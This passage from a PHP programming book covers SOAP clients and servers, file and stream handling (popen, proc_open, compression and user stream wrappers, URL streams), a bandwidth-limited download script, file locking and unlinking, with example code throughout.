            array('namespace' => 'urn:Example')
        );
        var_dump($response);
        ?>

    This is what goes over the wire (for the second call). You can see that there is much more XML magic than with XML-RPC:

        POST /chap_xml/soap/server.php HTTP/1.0
        User-Agent: PEAR-SOAP 0.7.1
        Host: kossu
        Content-Type: text/xml; charset=UTF-8
        Content-Length: 528
        SOAPAction: ""

        (SOAP envelope carrying the two parameters, 212.3 and 312.3)

        HTTP/1.1 200 OK
        Date: Tue, 31 Dec 2002 14:56:17 GMT
        Server: Apache/1.3.27 (Unix) PHP/4.4.0-dev
        X-Powered-By: PHP/4.4.0-dev
        Content-Length: 515
        Connection: close
        Content-Type: text/xml; charset=UTF-8

        (SOAP envelope carrying the return value, 524)

    8.7.2.2 PHP's SOAP Extension

    PHP 5 also comes with a SOAP extension, ext/soap, which has even more features than PEAR::SOAP and is written in C, whereas PEAR::SOAP is written in PHP. With this extension, we're going to implement the same examples as in the "PEAR::SOAP" section to show you the differences between the two packages. You need to enable the SOAP extension with the PHP configure option --enable-soap, or just uncomment the correct line in your php.ini file if you're using a Windows version of PHP.

    The SOAP extension also supports WSDL (pronounced "wizdel"), an XML vocabulary used to describe Web Services. With a WSDL file, the extension knows details such as the endpoint, the procedures, and the message types needed to connect to a service. Google's Web API SDK package (which you can download at http://www.google.com/apis/download.html) includes such a WSDL description file, but we cannot republish this WSDL file here, of course. What we can do is show you an example of how to use it:

        #!/usr/local/bin/php
        <?php
        /* $client is a SoapClient object created from Google's WSDL
         * file; the parameters are set up as in the PEAR::SOAP example */
        $res = $client->doGoogleSearch(
            $key, $query, $start, $maxResults, $filter, $restrict,
            $safeSearch, $lr, $ie, $oe
        );

        /* Display results */
        foreach ($res->resultElements as $result) {
            echo html_entity_decode(
                strip_tags("{$result->title}\n({$result->URL})\n\n")
            );
            echo wordwrap(html_entity_decode(strip_tags($result->snippet)));
            echo "\n\n----------------------------\n\n";
        }
        ?>

    If you compare this script with the one we used for PEAR::SOAP, you see that calling a SOAP method with WSDL is much easier: it takes only two lines!

    SOAP Server

    Developing a SOAP server and its accompanying WSDL file is not that hard, either; the largest problem is creating the WSDL description file. The WSDL file is not included here, but can be found in the examples archive belonging to this book. Here is the code that starts the server:

        $server->setClass("ExampleService");
        $server->handle();
        ?>

    With the help of the WSDL file, this connects the class that provides the method to the SOAP server. The handle() method takes care of processing the information when a client requests a method call.

    SOAP Client

    The client looks like this:

        <?php
        /* $s is a SoapClient object created from the service's WSDL file */
        try {
            echo $s->hello('Derick'), "\n";

    This first call is correct, as we supply a parameter to the function:

            echo $s->hello(), "\n";

    This one will throw the SOAP fault exception because the name parameter will be empty:

        } catch (SoapFault $e) {
            echo $e->faultcode, ' ', $e->faultstring, "\n";
        }
        ?>

    If we don't catch this exception, the script will die with a fatal error. Because we do catch it, the script shows this when executed:

        Hi Derick!
        SOAP-ENV:Server No name :(.

    8.8 SUMMARY

    XML was designed mainly for use in exchanging information across systems. XML has its own terminology that describes the structure of XML documents. The information is enclosed in tags that identify the information in a structured manner. To retrieve the actual information from XML documents in order to use it, you must parse the documents. PHP provides two mainstream parsers that you can use: SAX (Simple API for XML), which handles each element in the document as it comes to it, and DOM (Document Object Model), which parses the entire document at once and creates a hierarchical tree in memory containing its structure. PHP 5 also provides an easier extension for parsing simple XML documents: SimpleXML. PEAR provides packages useful for parsing in specific situations or for specific purposes.

    Often, you want to convert the XML document into a document with a different format, such as an HTML document or a text file. The standard method for converting XML is XSLT. XSLT uses stylesheets to convert documents, with specific templates for converting each element in the XML document. XSLT translation in PHP 5 is provided by the XSL extension.

    For applications on different systems to communicate, you need to use a protocol that both systems understand. XML files are plain-text files, which provide a standard format that systems understand. Two standard solutions for application communication are available in PHP: XML-RPC, which allows a client to execute methods on a server, and SOAP, which specifies a format for exchanging data across systems. Both are similar client-server protocols. However, SOAP is a more complex, broader protocol with more potential future applications.

    CHAPTER 9

    Mainstream Extensions

    "The important thing is not to stop questioning." (Albert Einstein)

    9.1 INTRODUCTION

    The previous chapters covered the most widely used extensions. This chapter presents other valuable mainstream extensions. The first section describes a group of functions that are part of the core PHP, not a separate extension. The remaining sections discuss several popular and useful extensions that are not part of the core PHP.

    After you finish reading this chapter, you will have learned how to

    ☞ Open, read, and write local and remote files
    ☞ Communicate with processes and programs
    ☞ Work with streams
    ☞ Match text, validate input text, replace text, split text, and perform other text manipulations using regular expressions with PHP functions
    ☞ Handle parsing and formatting dates and times, including DST issues
    ☞ Build images with the GD extension
    ☞ Extract meta information from digital images with the Exif extension
    ☞ Convert between single- and multi-byte character sets

    9.2 FILES AND STREAMS

    Accessing files has changed drastically. Prior to PHP 4.3.0, each type of file (local, compressed, remote) had a different implementation. However, with the introduction of streams, every interaction with a file makes use of the streams layer, a layer that abstracts access to the implementation details of a specific kind of "file." The streams layer makes it possible to create a GD image object from an HTTP source with a URL stream, work with compressed files, or copy data from one file to another. You can apply your own conversions during the copy process by implementing a user stream or filter.
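To make the idea of one streams layer more concrete, here is a minimal sketch (not taken from the book) in which a single helper reads text through three different wrappers. The helper name read_all(), the temporary file, and the use of the file:// and data:// wrappers are assumptions chosen for illustration; data:// needs PHP 5.2 or later and allow_url_fopen enabled.

```php
<?php
/* read_all() is a hypothetical helper used only in this sketch: it
 * reads everything from any path or URL that fopen() can open. */
function read_all($path)
{
    $fp = fopen($path, 'rb');
    if (!$fp) {
        return false;
    }
    $data = '';
    while (!feof($fp)) {
        $data .= fread($fp, 8192);
    }
    fclose($fp);
    return $data;
}

/* A plain local file, addressed by path and through file:// */
$tmp = tempnam(sys_get_temp_dir(), 'str');
file_put_contents($tmp, "Hello streams\n");
$plain      = read_all($tmp);
$viaWrapper = read_all('file://' . $tmp);

/* The same helper reading from an in-line data: URL */
$inline = read_all(
    'data://text/plain;base64,' . base64_encode("Hello streams\n")
);

unlink($tmp);
var_dump($plain === $viaWrapper, $plain === $inline);
```

The point of the sketch is that read_all() never needs to know which kind of "file" it is reading; only the path changes.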

    9.2.1 File Access

    Let's begin with the basic file-accessing functions. Originally, those functions only worked on normal files, so their names begin with "f," but PHP extends this to almost everything. The most used functions for file access are

    ☞ fopen(). Opens a handle to a local file, or a file from a URL
    ☞ fread(). Reads a block of data from a file
    ☞ fgets(). Reads one single line from a file
    ☞ fwrite() / fputs(). Writes a block of data to a file
    ☞ fclose(). Closes the opened file handle
    ☞ feof(). Returns true when the end of the file has been reached

    Working with files is easy, as the following example shows:

    In line 3, a file handle ($fp) is associated with the stream and the stream is associated with the counter.dat file that is on disk. The first parameter is the path to the file. The second parameter passed to fopen() is the mode. The mode specifies whether a stream is opened for reading, writing, both reading and writing, or appending. The following modes exist:

    ☞ r. Opens the stream in read-only mode. The file pointer is placed at the beginning of the stream.
    ☞ r+. Opens the stream for reading and writing. The file pointer is placed at the beginning of the stream.
    ☞ w. Opens the stream in write-only mode. The file is cleared and the file pointer is placed at the beginning of the stream. If the file does not exist, an attempt is made to create the file.
    ☞ w+. Opens the stream for reading and writing. The file is cleared and the file pointer is placed at the beginning of the stream. If the file does not exist, an attempt is made to create the file.
    ☞ a. Opens in write-only mode. The file pointer is placed at the end of the stream. If the file does not exist, an attempt is made to create the file.
    ☞ a+. Opens for reading and writing. The file pointer is placed at the end of the stream. If the file does not exist, an attempt is made to create it.

    The b modifier can be used with the mode to specify that the file is binary. Windows systems differentiate between text and binary files; if you don't use the b modifier for binary files in Windows, your file may become corrupted. Consequently, to make your scripts portable to Windows, it's wise to always use the b modifier when you work on a binary file, even when you are developing code on an operating system that doesn't require it. On UNIX OSs (Linux, FreeBSD, MacOSX, and so on), the b modifier has no effect whatsoever.

    Here's another small example. A third optional parameter to fopen(), true, tells PHP to look in your include path for the file. The following script first tries to open php.ini (in read-only mode) from /etc, then from /usr/local/etc, and finally from the current directory (the dot in the path specifies the current directory). Because php.ini is not a binary file, we do not use the b modifier for the mode:

        <?php
        /* Set the include path */
        ini_set('include_path', '/etc:/usr/local/etc:.');

        /* Open a handle to the file, searching the include path */
        $fp = fopen('php.ini', 'r', TRUE);

        /* Read all lines and print them */
        while (!feof($fp)) {
            $line = trim(fgets($fp, 256));
            echo ">$line<\n";
        }

        /* Close the stream handle */
        fclose($fp);
        ?>

    This script uses feof(), which is a function we haven't seen before. feof() tests whether the end of a file has been reached during the last fread() or fgets() call. We use fgets() here, with 256 as the second parameter. This number specifies the maximum length of the line that fgets() reads. It is important to choose this size carefully. PHP allocates this memory before reading, so if you use a value of 1,000,000, PHP allocates 1MB of memory, even if your line is only 12 characters long. If you omit the length, PHP 4.3.0 and later read until the end of the line; earlier versions assumed 1,024 bytes, which is enough for almost all applications.

    Try to decide whether you really need to load the entire file into memory when processing a file. Suppose you need to scan a text file for occurrences of a defined phrase with a regular expression. If you load the file into memory with the file_get_contents() function and then run the preg_match_all() function, you actively waste many resources. It would be more efficient to use a while (!feof($fp)) { $line = fgets($fp); } loop, which doesn't waste memory by loading the entire file into memory. It would speed up the regular expression matching as well.

    9.2.2 Program Input/Output

    Much like UNIX has the paradigm "All IO is a file," PHP has the paradigm "All IO is a stream." Thus, when you want to work with the input and output of a program, you open a stream to that program. Because you may need two channels to your program (one for reading and one for writing), you use one of two special functions to open the streams: popen() or proc_open().

    9.2.2.1 popen()

    popen() is the simpler function, providing only unidirectional IO to a program; you can only use r or w as the opening mode. When you open a stream to a program, also called a pipe (hence the name popen()), you can use all the normal file functions to read from or write to the pipe, and use (for example) feof() to check if there is no more input to read. Here is a small example that reads the output of ls -l /:
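A minimal sketch of such a script might look like the following. It assumes a UNIX-like system on which the ls command is available; the variable names are illustrative and not taken from the book.

```php
<?php
/* Open a read-only pipe to the command "ls -l /" */
$fp = popen('ls -l /', 'r');
if (!is_resource($fp)) {
    die("Could not start ls\n");
}

/* Read the program's output line by line, like a normal file */
$lines = array();
while (!feof($fp)) {
    $line = fgets($fp);
    if ($line !== false) {
        $lines[] = rtrim($line);
    }
}

/* pclose() closes the pipe and returns the exit status of the process */
$status = pclose($fp);

echo implode("\n", $lines), "\n";
```

Because the pipe was opened with mode r, the script can only read from ls; writing to the process would require a second popen() call with mode w, or proc_open().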

    9.2.2.2 proc_open()

    popen() is seldom useful because you cannot perform any interactive tasks with the opened process. But don't worry: PHP has a function to provide the missing functionality, proc_open(). With proc_open(), you can link all the input and output handlers of a process to either a pipe from which you can read, a pipe to which you can write from your script, or a file. A pipe is treated as a file handle, except that you can never open a file handle for reading and writing at the same time.

    proc_open() requires three parameters:

        resource proc_open ( string cmd, array descriptorspec, array pipes)

    The cmd parameter is the command to execute, such as /usr/local/bin/php. You don't need to specify the full path to the executable if it is in the system path.

    The descriptorspec parameter is more complex. descriptorspec is an array with each element describing a file handler for input or output.

    9.2.2.3 File Descriptors

        <?php
        $fin  = fopen("readfrom", "r");
        $fout = fopen("writeto", "w");
        $desc = array (0 => $fin, 1 => $fout);

        $res = proc_open("php", $desc, $pipes);
        if ($res) {
            proc_close($res);
        }
        ?>

    This script starts a PHP interpreter as a child process. It links the input for the child process to the file descriptor $fin (which is a file handler for the file "readfrom") and the output of the child process to $fout (which is a file handler for the file "writeto"). The "readfrom" file contains a one-line PHP script that echoes the string Hello you!. After the execution of the script, the file "writeto" contains

        Hello you!

    9.2.2.4 Pipes

    Instead of using a file handler for input and output to the PHP child process, as shown in the script in the previous section, you can open pipes to the child process that allow you to control the spawned process from your script. The following script sends a small PHP script from the script itself to the spawned PHP interpreter. It then reads the output of the child's echo statement, the text string "Hello you!", applies urlencode() to it, and writes the result to its own standard output.

        <?php
        $descs = array (
            0 => array('pipe', 'r'),
            1 => array('pipe', 'w')
        );

        $res = proc_open("php", $descs, $pipes);
        if (is_resource($res)) {
            fputs($pipes[0], '<?php echo "Hello you!\n"; ?>');
            fclose($pipes[0]);

            while (!feof($pipes[1])) {
                $line = fgets($pipes[1]);
                echo urlencode($line);
            }
            proc_close($res);
        }
        ?>

    The output is

        Hello+you%21%0A

    9.2.2.5 Files

    You can pass a file as the handler for the file descriptors to your process, as shown in the following example:

        <?php
        $descs = array (
            0 => array('pipe', 'r'),
            1 => array('file', 'output', 'w'),
            2 => array('file', 'errors', 'w')
        );

        $res = proc_open("php", $descs, $pipes);
        if (is_resource($res)) {
            fputs($pipes[0], '<?php echo "Hello you!\n"; ?>');
            fclose($pipes[0]);
            proc_close($res);
        }
        ?>

    The output file now contains

        Hello you!

    and the 'errors' file is empty.

    In addition to the input pipe[0] and the output pipe[1] shown in the previous examples, you can use other pipes to redirect all file descriptors of the child process. In the preceding example, we redirect all error messages sent to the standard error descriptor (2) to pipe[2], the file errors. The index of the $descs array is not limited to the indices 0-2, so you can always fiddle with all file descriptors as suits you. However, those additional file descriptors, with an index larger than 2, do not work yet on Windows because PHP doesn't implement a way for the client process to attach to them. Perhaps this will be addressed as PHP develops.

    9.2.3 Input/Output Streams

    With PHP, you can use stdin, stdout, and stderr as files. These "files," linked with the stdin, stdout, and stderr stream of the PHP process, can be accessed by using a protocol specifier in the call to fopen(). For the program input and output streams, this specifier is php://. This feature is most useful when working with the Command Line Interface (CLI), which is explained in more detail in Chapter 16, "PHP Shell Scripting."

    Two more IO streams are available: php://input and php://output. With php://input, you can read raw POST data. You may want to do so when you need to obtain the data from POST requests yourself, which can be useful when working with WebDAV, XML-RPC, or SOAP. The following example shows how to obtain form data from a form that has two fields with the same name:

    form.html:

        (an HTML form with two elements named "example": a text field and a select list)

    process.php:

        (a script that prints the heading "Dumping $_POST" followed by a dump of the $_POST array, and then the heading "Dumping php://input" followed by the raw data read from php://input)

    The first script contains only HTML code for a form. The form has two elements with the name "example": a text field and a select list. When you submit the form by clicking the submit query button, the script process.php runs and displays the output shown in Figure 9.1.

    Fig. 9.1 php://input representation of POST data

    As you can see, only one element (the selected value from the select list) is displayed when you dump the $_POST array. However, the data from both fields shows up in the php://input stream. You can parse this raw data yourself. Although raw data might not be particularly useful with simple POST data, it's useful to process WebDAV requests or to process requests initiated by other applications.

    The php://output stream can be used to write to PHP's output buffers, which is essentially the same as using echo or print(). php://stdin and php://input are read-only; php://stdout, php://stderr, and php://output are write-only.

    9.2.4 Compression Streams

    PHP provides some wrappers around compression functions. Previously, you needed specialized functions for accessing gzip and bzip compressed files; you can now use the streaming support for those libraries. Reading from and writing to a gzipped or bzipped file works exactly the same as reading and writing a normal file. To use the compression methods, you need to compile PHP with --with-zlib to provide the compress.zlib:// wrapper and --with-bz2 to provide the compress.bzip2:// wrapper. Of course, you need to have the zlib and/or bzip2 libraries installed before you can enable those extensions.
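As a rough illustration of how a compression wrapper behaves like a normal file, the following sketch writes some text through compress.zlib:// and reads it back. It assumes PHP was built with zlib support; the temporary file and the variable names are made up for this example.

```php
<?php
/* Sketch only: assumes the zlib extension is available */
$file = tempnam(sys_get_temp_dir(), 'gz');
$text = str_repeat("A line of log data\n", 100);

/* Write through the gzip wrapper; the trailing 1 in the mode
 * selects the fastest compression level */
$fw = fopen('compress.zlib://' . $file, 'wb1');
fwrite($fw, $text);
fclose($fw);

/* The file on disk holds the compressed data ... */
clearstatcache();
$compressedSize = filesize($file);

/* ... but reading through the wrapper yields the original text */
$fr = fopen('compress.zlib://' . $file, 'rb');
$copy = '';
while (!feof($fr)) {
    $copy .= fread($fr, 8192);
}
fclose($fr);
unlink($file);

printf("%d bytes stored for %d bytes of text\n",
    $compressedSize, strlen($text));
```

Apart from the compress.zlib:// prefix and the compression level in the mode, the code is the same fopen(), fwrite(), fread(), and fclose() sequence used for an ordinary file.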

    Gzip streams support more mode specifiers than the standard r, w, a, b, and +. These additional modifiers include the compression level, 1 to 9, and the compression methods f for filtered and h for Huffman-only compression. These modifiers only make sense if you open the file for writing.

    In the following example, we demonstrate copying a file from a bzipped file to a gzipped file. We make use of the compression level specifier 1 to speed up compression, and of the third parameter to fopen(), to specify searching for the file in the include path. Be careful when using the include path parameter because it will have a performance impact on your script. PHP tries to find and open the file throughout the entire include path, which slows down your script because file operations are generally slow operations on most operating systems.

    This script first sets the include path to /var/log, /usr/var/log, and the current directory (.). Next, it tries to open the logfile.bz2 file from the include path and opens the foo1.gz file for writing with compression level 1. If both streams are opened successfully, the script reads from the bzipped file until it reaches the end and writes the contents directly into the gzipped file. When the script finishes copying the contents, it closes the streams.

    Tip: Another great aspect of streams is that you can nest wrappers. For example, you can open a gzipped file over HTTP with the following URL:

        compress.zlib://http://www.example.com/foobar.gz

    9.2.5 User Streams

    The streams layer in PHP 5 allows defining User Streams: stream wrappers implemented in PHP code. A User Stream is implemented by a class and, for every file operation (opening and reading, for instance), you need to implement a method. This section describes the methods that must be implemented.

    9.2.5.1 boolean stream_open ( string path, string mode, int options, string opened_path);

    This function is called when fopen() is called on this stream. The path is the full URL as specified in the fopen() call, which you need to interpret correctly. The parse_url() function helps with this. You also need to validate the mode yourself. The options parameter, set by the streams API, is a bit field consisting of the following constants:

    ☞ STREAM_USE_PATH. This constant is set in the bit field when TRUE was passed as the use_include_path parameter to fopen(). It's up to you to do something with it if needed.
    ☞ STREAM_REPORT_ERRORS. If this constant is set, you need to handle errors yourself with the trigger_error() function; if it's not set, you should not raise any errors yourself.

    9.2.5.2 void stream_close ( void );

    The stream_close method is called when fclose() is called on the stream, or when PHP closes the stream resource during shutdown. You need to take care of releasing any resources that you might have locked or opened.

    9.2.5.3 string stream_read ( int count);

    When fgets() or fread() triggers a read request on the stream, the stream_read method is called in response. You should always try to return count bytes from the stream. If that much data is not available, just return as many bytes as you have left in the stream. If no data is available, return FALSE or an empty string. Do not forget to update the read/write position of the stream. This position is usually stored in the position property of your class.

    9.2.5.4 int stream_write ( string data);

    The stream_write method is called when fputs() or fwrite() is called on this stream. You should store as much of the data as possible, and return the number of bytes that actually were stored in the container. If no data could be stored, you should return 0. You should also take care of updating the position pointer.

    9.2.5.5 boolean stream_eof ( void );

    This method is called when feof() is called on the stream. Return TRUE if the end of the stream is reached, or FALSE if the end has not been reached yet.

9.2.5.6 int stream_tell ( void );

The stream_tell() method is called on a ftell() request on the stream. You should return the value of the read/write position pointer.

9.2.5.7 boolean stream_seek ( int offset, int whence);

stream_seek is called when fseek() is applied on the stream handle. The offset is an integer value that moves the file pointer (seeking) back (on a negative number) or forward (on a positive number). The seek offset is calculated based on the second parameter, which has one of the following constants:

☞ SEEK_SET. The offset passed to the function should be calculated from the beginning.
☞ SEEK_CUR. The offset is relative to the current stream position.
☞ SEEK_END. The offset is relative to the end of the stream. Positions in the stream have a negative offset; positive offsets correspond with positions after the end of the stream.

The function should implement the changing of the stream pointer and return TRUE if the position could be changed, or FALSE if the seek could not be executed.

9.2.5.8 boolean stream_flush ( void );

Your user stream may cache data written to the stream for better performance. The method stream_flush() is called when the user commits all cached data with the fflush() function. If there was no cached data or all cached data could be written to the storage container (such as a file or a table in a database), the function should return TRUE; if the cached data could not be committed to the storage container, it should return FALSE.

9.2.6 URL Streams

The last category of streams is URL streams. URL streams have a path that resembles a URL, such as http://example.com/index.php or ftp://user:password@ftp.example.com. In fact, all special wrappers use a URL-like path, such as compress.zlib://file.gz. However, only schemes that resemble a remote resource, such as a file on an FTP server or a document on a gopher server, fall into the category URL streams. The basic URL streams that PHP supports are

☞ http://. For files located on an HTTP server
☞ https://. For files located on an SSL enhanced HTTP server
☞ ftp://. For files on an FTP server
☞ ftps://. For files on an FTP server with SSL support
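Returning briefly to the User Streams of Section 9.2.5, the methods described there might fit together as in the following sketch. The class name VarStream, the var:// scheme, and the in-memory storage are all hypothetical choices made for illustration; the sketch also skips real mode validation and treats the host part of the URL as the name of the stored value.

```php
<?php
// Hypothetical wrapper: keeps each stream's data in a static array, keyed by the URL host.
class VarStream
{
    private static $store = array();
    private $name;
    private $position = 0;
    public $context; // PHP assigns the stream context here, if one was passed

    public function stream_open($path, $mode, $options, &$opened_path)
    {
        $url = parse_url($path);
        if (empty($url['host'])) {
            if ($options & STREAM_REPORT_ERRORS) {
                trigger_error("Invalid path: $path", E_USER_WARNING);
            }
            return false;
        }
        $this->name = $url['host'];
        // Start with an empty value for new names and for "w" modes.
        if (!isset(self::$store[$this->name]) || strpos($mode, 'w') !== false) {
            self::$store[$this->name] = '';
        }
        $this->position = 0;
        return true;
    }

    public function stream_close()
    {
        // Nothing was locked or opened, so there is nothing to release.
    }

    public function stream_read($count)
    {
        $data = (string) substr(self::$store[$this->name], $this->position, $count);
        $this->position += strlen($data);
        return $data;
    }

    public function stream_write($data)
    {
        $value = self::$store[$this->name];
        $left  = (string) substr($value, 0, $this->position);
        $right = (string) substr($value, $this->position + strlen($data));
        self::$store[$this->name] = $left . $data . $right;
        $this->position += strlen($data);
        return strlen($data);
    }

    public function stream_eof()
    {
        return $this->position >= strlen(self::$store[$this->name]);
    }

    public function stream_tell()
    {
        return $this->position;
    }

    public function stream_seek($offset, $whence)
    {
        $length = strlen(self::$store[$this->name]);
        switch ($whence) {
            case SEEK_SET: $target = $offset; break;
            case SEEK_CUR: $target = $this->position + $offset; break;
            case SEEK_END: $target = $length + $offset; break;
            default: return false;
        }
        if ($target < 0) {
            return false;
        }
        $this->position = $target;
        return true;
    }

    public function stream_flush()
    {
        return true; // writes are never cached in this sketch
    }
}

stream_wrapper_register('var', 'VarStream');

$fp = fopen('var://demo', 'w+');
fwrite($fp, 'Hello streams');
rewind($fp);
$first = fread($fp, 5);      // read from the beginning
fseek($fp, -7, SEEK_END);    // negative offset relative to the end
$last = fread($fp, 7);
fclose($fp);
```

Once the wrapper is registered, the ordinary file functions work on var:// paths without knowing anything about the class behind them.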

SSL support for HTTP and FTP is only available if you added OpenSSL by specifying --with-openssl when you configured PHP. For authentication to HTTP or FTP servers, you can prefix the hostname in the URL with username:password@, as in the following:

    $fp = fopen('ftp://derick:secret@ftp.php.net', 'wb');

The HTTP handler only supports the reading of files, so you need to specify the mode rb. (Strictly, the b is only needed on Windows, but it doesn't hurt to add it.) The FTP handler supports opening a stream only in either read or write mode, but not in both simultaneously. Also, if you try to open an existing file for writing, the connection fails, unless you set the 'overwrite' context option:

    <?php
    $context = stream_context_create(
        array('ftp' => array('overwrite' => true)));
    $fp = fopen('ftp://secret@ftp.php.net', 'wb', false, $context);
    ?>

The following example demonstrates reading a file from an HTTP server and saving it into a compressed file (see Figure 9.2). This example also introduces a fourth parameter to the fopen() call that specifies a context for the stream. By using the context parameter, you can set special options for a stream. For example, you can set a notifier. This notifier callback will be called on different events during the transaction:

Fig. 9.2 phpsuck in action.

    #!/usr/local/bin/php
    <?php
    /* Check for arguments */
    if ($argc < 2) {
        echo "Usage: phpsuck.php url [max kb/sec]\n";
        exit(-1);
    }

    /* Url to fetch */
    $url = $argv[1];

    /* Bandwidth limiting */
    if ($argc == 3) {
        $max_kb_sec = $argv[2];
    } else {
        $max_kb_sec = 1000;
    }

    /* Cursor to column 1 for xterms */
    $term_sol = "\x1b[1G";
    $severity_map = array (
        0 => 'info   ',
        1 => 'warning',
        2 => 'error  '
    );

    /* Callback function for stream events */
    function notifier($code, $severity, $msg, $xcode, $sofar, $max)
    {
        global $term_sol, $severity_map, $max_kb_sec, $size;

        /* Do not print status message prefix when the PROGRESS
         * event is received. */
        if ($code != STREAM_NOTIFY_PROGRESS) {
            echo $severity_map[$severity]. ": ";
        }

        switch ($code) {
            case STREAM_NOTIFY_CONNECT:
                printf("Connected\n");
                /* Set begin time for kb/sec calculation */
                $GLOBALS['begin_time'] = time() - 0.001;
                break;
            case STREAM_NOTIFY_AUTH_REQUIRED:
                printf("Authentication required: %s\n", trim($msg));
                break;
            case STREAM_NOTIFY_AUTH_RESULT:
                printf("Logged in: %s\n", trim($msg));
                break;
            case STREAM_NOTIFY_MIME_TYPE_IS:
                printf("Mime type: %s\n", $msg);
                break;
            case STREAM_NOTIFY_FILE_SIZE_IS:
                printf("Downloading %d kb\n", $max / 1024);
                /* Set the global size variable */
                $size = $max;
                break;
            case STREAM_NOTIFY_REDIRECTED:
                printf("Redirecting to %s...\n", $msg);
                break;
            case STREAM_NOTIFY_PROGRESS:
                /* Calculate the number of stars and stripes */
                if ($size) {
                    $stars = str_repeat('*', (int) ($sofar * 50 / $size));
                } else {
                    $stars = '';
                }
                $stripe = str_repeat('-', 50 - strlen($stars));

                /* Calculate download speed in kb/sec */
                $kb_sec = ($sofar / (time() - $GLOBALS['begin_time'])) / 1024;

                /* Pause the script if we are above the maximum suck
                 * speed */
                while ($kb_sec > $max_kb_sec) {
                    usleep(1);
                    $kb_sec = ($sofar / (time() - $GLOBALS['begin_time'])) / 1024;
                }

                /* Display the progress bar */
                printf("{$term_sol}[%s] %d kb %.1f kb/sec",
                    $stars.$stripe, $sofar / 1024, $kb_sec);
                break;
            case STREAM_NOTIFY_FAILURE:
                printf("Failure: %s\n", $msg);
                break;
        }
    }

    /* Determine filename to save to */
    $url_data = parse_url($argv[1]);
    $file = isset($url_data['path']) ? basename($url_data['path']) : '';
    if (empty($file)) {
        $file = "index.html";
    }
    printf("Saving to $file.gz\n");
    $fil = "compress.zlib://$file.gz";

    /* Create context and set the notifier callback */
    $context = stream_context_create();
    stream_context_set_params($context, array("notification" => "notifier"));

    /* Open the target URL */
    $fp = fopen($url, "rb", false, $context);
    if (is_resource($fp)) {
        /* Open the local file */
        $fs = fopen($fil, "wb9", false, $context);
        if (is_resource($fs)) {
            /* Read data from URL in blocks of 1024 bytes */
            while (!feof($fp)) {
                $data = fread($fp, 1024);
                fwrite($fs, $data);
            }
            /* Close local file */
            fclose($fs);
        }
        /* Close remote file */
        fclose($fp);

        /* Display download information */
        printf("{$term_sol}[%s] Download time: %ds\n",
            str_repeat('*', 50), time() - $GLOBALS['begin_time']);
    }
    ?>

Some events can be handled in the notify callback function. Although most are only useful for debug purposes (NOTIFY_CONNECT, NOTIFY_AUTH_REQUIRED, NOTIFY_AUTH_RESULT), others can be used to perform some neat tricks, like the bandwidth limiting we do in the previous example. The following is a full list of all the different events.

STREAM_NOTIFY_CONNECT
    This event is fired when a connection with the resource has been established, for example, when the script connected to an HTTP server.

STREAM_NOTIFY_AUTH_REQUIRED
    This event is triggered by the stream's API when the resource requests authorization.

STREAM_NOTIFY_AUTH_RESULT
    As soon as the authentication has finished, this event is triggered to tell you if there was a successful authentication or a failure.

STREAM_NOTIFY_MIME_TYPE_IS
    The HTTP stream wrapper (http:// and https://) fires this event when the Content-Type header is available in the response to the HTTP request.

STREAM_NOTIFY_FILE_SIZE_IS
    This event is triggered when the FTP wrapper figures out the size of the file, or when an HTTP wrapper sees the Content-Length header.

STREAM_NOTIFY_REDIRECTED
    This event is triggered by the HTTP wrapper when it encounters a redirect request (Location: header).

STREAM_NOTIFY_PROGRESS
    This is one of the fancier events; it is used extensively in our example. It's sent as soon as a packet of data has arrived. In our example, we used this event to perform bandwidth limiting and display the progress bar.

STREAM_NOTIFY_FAILURE
    When a failure occurs, such as when the login credentials were wrong, the wrapper triggers this event.

9.2.7 Locking

While writing to files that are possibly being read by other scripts at the same time, you will run into problems at some point because a write might not be totally completed while another script is reading the same file. The reading script will only see a partial file at that moment. Preventing this problem is not hard to do, and the method for this is called locking.

PHP can set locks on files with the flock() function. Locking a file prevents a reading script from reading a file when it is being written to by another script; the only prerequisite for this is that both scripts (the reader and the writer) implement the locking. A simple set of scripts may look like this:
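A cooperating writer and reader could be sketched along these lines. This is a minimal sketch under assumptions, not the book's scripts: the helper names write_locked() and read_locked() are hypothetical, and the file is a throwaway temporary file. The writer takes an exclusive lock (LOCK_EX) and the reader a shared lock (LOCK_SH), so a reader never sees a half-written file.

```php
<?php
// Hypothetical helper: replace the file's contents while holding an exclusive lock.
function write_locked($file, $data)
{
    $fp = fopen($file, 'c');   // "c" opens for writing without truncating first
    if (!$fp) {
        return false;
    }
    if (!flock($fp, LOCK_EX)) {
        fclose($fp);
        return false;
    }
    ftruncate($fp, 0);         // truncate only after the lock is held
    fwrite($fp, $data);
    fflush($fp);
    flock($fp, LOCK_UN);
    fclose($fp);
    return true;
}

// Hypothetical helper: read the whole file while holding a shared lock.
function read_locked($file)
{
    $fp = fopen($file, 'r');
    if (!$fp) {
        return false;
    }
    flock($fp, LOCK_SH);
    $data = stream_get_contents($fp);
    flock($fp, LOCK_UN);
    fclose($fp);
    return $data;
}

$file = tempnam(sys_get_temp_dir(), 'lck');
$written = write_locked($file, date("Y-m-d H:i:s") . "\n");
$read = read_locked($file);
unlink($file);
```

Opening with mode "c" rather than "w" is a deliberate choice here: "w" would truncate the file before the lock is acquired, which is exactly the window a reader must not see.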

        fclose($fp);
        sleep(1);
    }
    ?>

At the end of the script, we sleep for 1 second so that we are not using 100 percent CPU time.

9.2.8 Renaming and Removing Files

PHP provides the unlink() function for deleting a file, which "unlinks" the file from a directory. On a UNIX-like system the file will only be deleted if no programs have this file in use. This means that with the following script, the bytes associated with the file will only be released to the operating system after the fclose() is executed:
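The behavior can be observed with a sketch like the one below. It assumes a UNIX-like system (on Windows, unlink() on an open file typically fails), and the temporary file name is generated only for this illustration.

```php
<?php
// Throwaway file created for this sketch.
$file = tempnam(sys_get_temp_dir(), 'unl');

$fp = fopen($file, 'w+');
fwrite($fp, "still here\n");

// Remove the directory entry while the handle is still open.
unlink($file);
clearstatcache();
$visible = file_exists($file);   // the name is gone from the directory

// The open handle still reaches the data.
rewind($fp);
$data = fgets($fp);

// Only now are the bytes released to the operating system.
fclose($fp);
```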

During execution, you will not see the file in the directory anymore after unlink() is run. But, lsof still shows the file as being in use, and you can still read from it and write to it:

    $ sudo lsof | grep testfile
    php 14795 derick 3w REG 3,10 0 39636 /unlink/testfile (deleted)

